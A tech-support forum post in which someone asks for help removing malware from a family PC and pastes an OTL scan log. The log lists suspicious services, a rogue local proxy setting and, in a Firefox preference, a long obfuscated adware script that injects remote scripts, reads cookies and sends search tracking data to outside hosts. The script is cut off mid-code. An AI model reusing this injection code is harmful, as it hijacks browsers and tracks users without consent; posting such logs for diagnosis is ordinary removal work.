I'll preface this by saying this isn't my computer, at least not in the past year. Two preteens (my siblings) have been consistently downloading hacking tools and lord knows what else for the past year. Now Malwarebytes, Norton Security Suite and HijackThis (probably other programs; I can't even tell anymore) have disappeared and can't be reinstalled.
The computer's performance is also unbelievably slow. OTL was the only program I could run since it just runs straight from the downloadable file. These are two of the errors I got when trying to reinstall Malwarebytes:http://imgur.com/a/QLJBH Malwarebytes still has a folder in Program Files (x86), but it's locked and says I don't have permission to delete, access or run any files from it. Here are the OTL logs. Extras will be in a reply because I get an error when I try to put both.
Edit: Forgot to mention that Malwarebytes doesn't appear in Add/Remove programs anymore, either.
OTL logfile created on: 5/30/2014 11:12:02 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Owner\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17041)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
7.99 Gb Total Physical Memory | 7.18 Gb Available Physical Memory | 89.90% Memory free
15.98 Gb Paging File | 15.19 Gb Available in Paging File | 95.05% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 917.83 Gb Total Space | 133.70 Gb Free Space | 14.57% Space Free | Partition Type: NTFS
Drive D: | 13.68 Gb Total Space | 1.92 Gb Free Space | 14.07% Space Free | Partition Type: NTFS
Drive K: | 1.86 Gb Total Space | 0.01 Gb Free Space | 0.32% Space Free | Partition Type: FAT32
Computer Name: OWNER-PC | User Name: Owner | Logged in as Administrator.
Boot Mode: SafeMode | Scan Mode: Current user | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
========== Processes (SafeList) ==========
PRC - C:\Users\Owner\Desktop\OTL.exe (OldTimer Tools)
PRC - C:\Users\Owner\Documents\WindSys\ws.exe (Microsoft Corp.)
PRC - C:\Windows\SysWOW64\Windows Server\wserver.exe ()
========== Modules (No Company Name) ==========
========== Services (SafeList) ==========
SRV:64bit: - (!SASCORE) -- C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE File not found
SRV:64bit: - (HitmanProScheduler) -- C:\Program Files\HitmanPro\hmpsched.exe (SurfRight B.V.)
SRV:64bit: - (IEEtwCollectorService) -- C:\Windows\SysNative\IEEtwCollector.exe (Microsoft Corporation)
SRV:64bit: - (AMD External Events Utility) -- C:\Windows\SysNative\atiesrxx.exe (AMD)
SRV:64bit: - (tvnserver) -- C:\Program Files\TightVNC\tvnserver.exe (GlavSoft LLC.)
SRV:64bit: - (FLEXnet Licensing Service 64) -- C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe (Acresso Software Inc.)
SRV:64bit: - (1a34a8e0) -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
SRV - (PnkBstrA) -- C:\Windows\SysWOW64\PnkBstrA.exe ()
SRV - (CltMngSvc) -- C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe (Client Connect LTD)
SRV - (AdobeFlashPlayerUpdateSvc) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe (Adobe Systems Incorporated)
SRV - (Hamachi2Svc) -- C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe (LogMeIn Inc.)
SRV - (MozillaMaintenance) -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe (Mozilla Foundation)
SRV - (LMIGuardianSvc) -- C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe (LogMeIn, Inc.)
SRV - (ASD2Svc) -- C:\Program Files (x86)\Anvisoft\Anvi Smart Defender\ASD2Srv.exe ()
SRV - (Apache2.4) -- C:\xampp\apache\bin\httpd.exe (Apache Software Foundation)
SRV - (Steam Client Service) -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe (Valve Corporation)
SRV - (AnviCsbSvc) -- C:\Program Files (x86)\Anvisoft\Cloud System Booster\CSBSvc.exe (Anvisoft)
SRV - (AdobeARMservice) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Systems Incorporated)
SRV - (SkypeUpdate) -- C:\Program Files (x86)\Skype\Updater\Updater.exe (Skype Technologies)
SRV - (clr_optimization_v4.0.30319_32) -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe (Microsoft Corporation)
SRV - (CodeMeter.exe) -- C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe (WIBU-SYSTEMS AG)
SRV - (npggsvc) -- C:\Windows\SysWOW64\GameMon.des (INCA Internet Co., Ltd.)
SRV - (FileZillaServer) -- C:\xampp\FileZillaFTP\FileZillaServer.exe (FileZilla Project)
SRV - (IAStorDataMgrSvc) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe (Intel Corporation)
SRV - (GamesAppService) -- C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe (WildTangent, Inc.)
SRV - (FLEXnet Licensing Service) -- C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe (Acresso Software Inc.)
SRV - (ACDaemon) -- C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe (ArcSoft Inc.)
SRV - (FirebirdGuardianDefaultInstance) -- C:\Program Files (x86)\Firebird\Firebird_2_1\bin\fbguard.exe (Firebird Project)
SRV - (FirebirdServerDefaultInstance) -- C:\Program Files (x86)\Firebird\Firebird_2_1\bin\fbserver.exe (Firebird Project)
SRV - (clr_optimization_v2.0.50727_32) -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe (Microsoft Corporation)
SRV - (USBSafelyRemoveService) -- C:\Program Files (x86)\USB Safely Remove\USBSRService.exe ()
SRV - (Adobe Version Cue CS4) -- C:\Program Files (x86)\Common Files\Adobe\Adobe Version Cue CS4\Server\bin\VersionCueCS4.exe (Adobe Systems Incorporated)
========== Driver Services (SafeList) ==========
DRV:64bit: - (hitmanpro37) -- C:\Windows\SysNative\drivers\hitmanpro37.sys ()
DRV:64bit: - (MBAMSwissArmy) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys (Malwarebytes Corporation)
DRV:64bit: - (AVGIDSDriver) -- C:\Windows\SysNative\drivers\avgidsdrivera.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (Avgtdia) -- C:\Windows\SysNative\drivers\avgtdia.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (Avgmfx64) -- C:\Windows\SysNative\drivers\avgmfx64.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (AVGIDSHA) -- C:\Windows\SysNative\drivers\avgidsha.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (Avgdiska) -- C:\Windows\SysNative\drivers\avgdiska.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (Avgldx64) -- C:\Windows\SysNative\drivers\avgldx64.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (Avgloga) -- C:\Windows\SysNative\drivers\avgloga.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (Avgrkx64) -- C:\Windows\SysNative\drivers\avgrkx64.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (asd2fsm) -- C:\Windows\SysNative\drivers\asd2fsm.sys (Anvisoft)
DRV:64bit: - (taphss6) -- C:\Windows\SysNative\drivers\taphss6.sys (Anchorfree Inc.)
DRV:64bit: - (ssudmdm) -- C:\Windows\SysNative\drivers\ssudmdm.sys (DEVGURU Co., LTD.(www.devguru.co.kr))
DRV:64bit: - (dg_ssudbus) -- C:\Windows\SysNative\drivers\ssudbus.sys (DEVGURU Co., LTD.(www.devguru.co.kr))
DRV:64bit: - (SymEvent) -- C:\Windows\SysNative\drivers\SYMEVENT64x86.SYS (Symantec Corporation)
DRV:64bit: - (SymEFA) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\symefa64.sys (Symantec Corporation)
DRV:64bit: - (SymDS) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\symds64.sys (Symantec Corporation)
DRV:64bit: - (SRTSP) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\srtsp64.sys (Symantec Corporation)
DRV:64bit: - (SymNetS) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\symnets.sys (Symantec Corporation)
DRV:64bit: - (ccSet_N360) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\ccsetx64.sys (Symantec Corporation)
DRV:64bit: - (USBAAPL64) -- C:\Windows\SysNative\drivers\usbaapl64.sys (Apple, Inc.)
DRV:64bit: - (SRTSPX) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\srtspx64.sys (Symantec Corporation)
DRV:64bit: - (GEARAspiWDM) -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys (GEAR Software Inc.)
DRV:64bit: - (ScreamBAudioSvc) -- C:\Windows\SysNative\drivers\ScreamingBAudio64.sys (Screaming Bee LLC)
DRV:64bit: - (atikmdag) -- C:\Windows\SysNative\drivers\atikmdag.sys (Advanced Micro Devices, Inc.)
DRV:64bit: - (amdkmdag) -- C:\Windows\SysNative\drivers\atikmdag.sys (Advanced Micro Devices, Inc.)
DRV:64bit: - (SymIRON) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\ironx64.sys (Symantec Corporation)
DRV:64bit: - (amdkmdap) -- C:\Windows\SysNative\drivers\atikmpag.sys (Advanced Micro Devices, Inc.)
DRV:64bit: - (tenCapture) -- C:\Windows\SysNative\drivers\tenCapture.sys (Hajo Krabbenhöft)
DRV:64bit: - (athr) -- C:\Windows\SysNative\drivers\athrx.sys (Qualcomm Atheros Communications, Inc.)
DRV:64bit: - (taphss) -- C:\Windows\SysNative\drivers\taphss.sys (AnchorFree Inc)
DRV:64bit: - (AtiHDAudioService) -- C:\Windows\SysNative\drivers\AtihdW76.sys (Advanced Micro Devices)
DRV:64bit: - (Fs_Rec) -- C:\Windows\SysNative\drivers\fs_rec.sys (Microsoft Corporation)
DRV:64bit: - (mcaudrv_simple) -- C:\Windows\SysNative\drivers\mcaudrv_x64.sys (ManyCam LLC)
DRV:64bit: - (ManyCam) -- C:\Windows\SysNative\drivers\mcvidrv_x64.sys (ManyCam LLC)
DRV:64bit: - (VBoxNetAdp) -- C:\Windows\SysNative\drivers\VBoxNetAdp.sys (Oracle Corporation)
DRV:64bit: - (RsFx0105) -- C:\Windows\SysNative\drivers\RsFx0105.sys (Microsoft Corporation)
DRV:64bit: - (amdsata) -- C:\Windows\SysNative\drivers\amdsata.sys (Advanced Micro Devices)
DRV:64bit: - (amdxata) -- C:\Windows\SysNative\drivers\amdxata.sys (Advanced Micro Devices)
DRV:64bit: - (HpSAMD) -- C:\Windows\SysNative\drivers\HpSAMD.sys (Hewlett-Packard Company)
DRV:64bit: - (TsUsbFlt) -- C:\Windows\SysNative\drivers\TsUsbFlt.sys (Microsoft Corporation)
DRV:64bit: - (iaStor) -- C:\Windows\SysNative\drivers\iaStor.sys (Intel Corporation)
DRV:64bit: - (RTL8167) -- C:\Windows\SysNative\drivers\Rt64win7.sys (Realtek )
DRV:64bit: - (sptd) -- C:\Windows\SysNative\drivers\sptd.sys (Duplex Secure Ltd.)
DRV:64bit: - (AtiHdmiService) -- C:\Windows\SysNative\drivers\AtiHdmi.sys (ATI Technologies, Inc.)
DRV:64bit: - (PxHlpa64) -- C:\Windows\SysNative\drivers\PxHlpa64.sys (Sonic Solutions)
DRV:64bit: - (mfeavfk) -- C:\Windows\SysNative\drivers\mfeavfk.sys (McAfee, Inc.)
DRV:64bit: - (mfesmfk) -- C:\Windows\SysNative\drivers\mfesmfk.sys (McAfee, Inc.)
DRV:64bit: - (mferkdk) -- C:\Windows\SysNative\drivers\mferkdk.sys (McAfee, Inc.)
DRV:64bit: - (mfehidk) -- C:\Windows\SysNative\drivers\mfehidk.sys (McAfee, Inc.)
DRV:64bit: - (igfx) -- C:\Windows\SysNative\drivers\igdkmd64.sys (Intel Corporation)
DRV:64bit: - (amdsbs) -- C:\Windows\SysNative\drivers\amdsbs.sys (AMD Technologies Inc.)
DRV:64bit: - (LSI_SAS2) -- C:\Windows\SysNative\drivers\lsi_sas2.sys (LSI Corporation)
DRV:64bit: - (stexstor) -- C:\Windows\SysNative\drivers\stexstor.sys (Promise Technology)
DRV:64bit: - (ebdrv) -- C:\Windows\SysNative\drivers\evbda.sys (Broadcom Corporation)
DRV:64bit: - (b06bdrv) -- C:\Windows\SysNative\drivers\bxvbda.sys (Broadcom Corporation)
DRV:64bit: - (b57nd60a) -- C:\Windows\SysNative\drivers\b57nd60a.sys (Broadcom Corporation)
DRV:64bit: - (hcw85cir) -- C:\Windows\SysNative\drivers\hcw85cir.sys (Hauppauge Computer Works, Inc.)
DRV:64bit: - (hamachi) -- C:\Windows\SysNative\drivers\hamachi.sys (LogMeIn, Inc.)
DRV:64bit: - (RTL8169) -- C:\Windows\SysNative\drivers\Rtlh64.sys (Realtek Corporation )
DRV:64bit: - (ENTECH64) -- C:\Windows\SysNative\drivers\Entech64.sys (EnTech Taiwan)
DRV:64bit: - (adfs) -- C:\Windows\SysNative\drivers\adfs.sys (Adobe Systems, Inc.)
DRV:64bit: - (UsbFltr) -- C:\Windows\SysNative\drivers\UsbFltr.sys (Waytech Development, Inc.)
DRV - (NAVEX15) -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\Definitions\VirusDefs\20131130.007\EX64.SYS (Symantec Corporation)
DRV - (eeCtrl) -- C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys (Symantec Corporation)
DRV - (NAVENG) -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\Definitions\VirusDefs\20131130.007\ENG64.SYS (Symantec Corporation)
DRV - (IDSVia64) -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\Definitions\IPSDefs\20131128.001\IDSvia64.sys (Symantec Corporation)
DRV - (BHDrvx64) -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\Definitions\BASHDefs\20131114.001\BHDrvx64.sys (Symantec Corporation)
DRV - (CEDRIVER60) -- C:\Program Files (x86)\Cheat Engine 6.3\dbk64.sys ()
DRV - (XFDriver64) -- C:\Program Files (x86)\Xfire2\XFDriver64.sys (XFire)
DRV - (Normandy) -- C:\Windows\SysWow64\drivers\Normandy.sys ()
DRV - (cpudrv64) -- C:\Program Files (x86)\SystemRequirementsLab\cpudrv64.sys ()
DRV - (WIMMount) -- C:\Windows\SysWOW64\drivers\wimmount.sys (Microsoft Corporation)
DRV - (adfs) -- C:\Windows\SysWow64\drivers\adfs.sys (Adobe Systems, Inc.)
========== Standard Registry (SafeList) ==========
========== Internet Explorer ==========
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {9BB47C17-9C68-4BB3-B188-DD9AF0FD20}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = about:blank
IE - HKLM\..\SearchScopes,DefaultScope = {BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
IE - HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = about:blank
IE - HKCU\..\SearchScopes,DefaultScope = {006ee092-9658-4fd6-bd8e-a21a348e59f5}
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = 127.0.0.1;localhost;10.*;192.168.*;127.0.0.1:895;127.0.0.1:896;<local>
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyServer" = http=127.0.0.1:8555;https=127.0.0.1:8555
========== FireFox ==========
FF - prefs.js..browser.search.defaultenginename,S: S", "WebSearch"
FF - prefs.js..browser.search.order.1: "WebSearch"
FF - prefs.js..browser.search.order.1,S: S", "WebSearch"
FF - prefs.js..browser.search.selectedEngine: "Google"
FF - prefs.js..browser.search.selectedEngine,S: S", "WebSearch"
FF - prefs.js..browser.search.suggest.enabled: false
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..extensions.1pSpmomrG.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=b3qau4\")>-1||url.indexOf(\"hash=ijeqe4\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|greatresults|youwillfind|lookforitthere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|searchisfun|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"iklk.com\")>-1){return}}catch(e){};if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//cdncache-a.akamaihd.net/loaders/1063/l.js?aoi=1311798366&pid=1063&zoneid=15224';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top && window.self.location.protocol=='http:'){var script=document.createElement('script');script.type='text/javascript';script.src='//istatic.datafastguru.info/fo/min/wp.js?subid=315_2405&hid=17411091879117559275';document.getElementsByTagName(\"head\")[0].appendChild(script);};try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"
http://istatic.dataf...091879117559275\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1500/l.js?aoi=1311798366&pid=1500&zoneid=413603&ext=save%20on&systemid=17411091879117559275\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){if(window.self==window.top&&!document.getElementById('shk85shssma')){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.id='shk85shssma';a.src=-1<window.self.location.hostname.indexOf(\"cebook.co\")?\"//cdncache-a.akamaihd.net/loaders/1543/l.js?aoi=1311798366&pid=1543&zoneid=413603&ext=save%20on&systemid=17411091879117559275\":\"//asrv-a.akamaihd.net/sd/1018/1005.js\";document.getElementsByTagName(\"head\")[0].appendChild(a);}})();;if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//api.jollywallet.com/affiliate/client?dist=87&sub=2';document.getElementsByTagName(\"head\")[0].appendChild(script);};window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.4.1\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c, B){if( B){var g=new Date;g.setTime(g.getTime()+864E5* B);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c
;\" \"==g.charAt(0);)g=g.substring(1,g.length); if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function( B){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c, B){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange= function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent( B);this.xhr.send( B)}};a.waitForTokens={};a.addScript=function(a, B){if(\"bing\"== B){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©; clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a, B){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!= typeof window.getComputedStyle?function( B){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a, B){return window.getComputedStyle(a, B)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch( B){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1< b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild( B);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b= new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a, B){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)}, B)}};a.epoch=function(){return(new Date).getTime()};a.msie=function(){var a= parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url= function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test( B))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src= b.pixelHost+\"?hid=17411091879117559275&eid=315&pid=2405&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=US&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\", \"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0; c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst 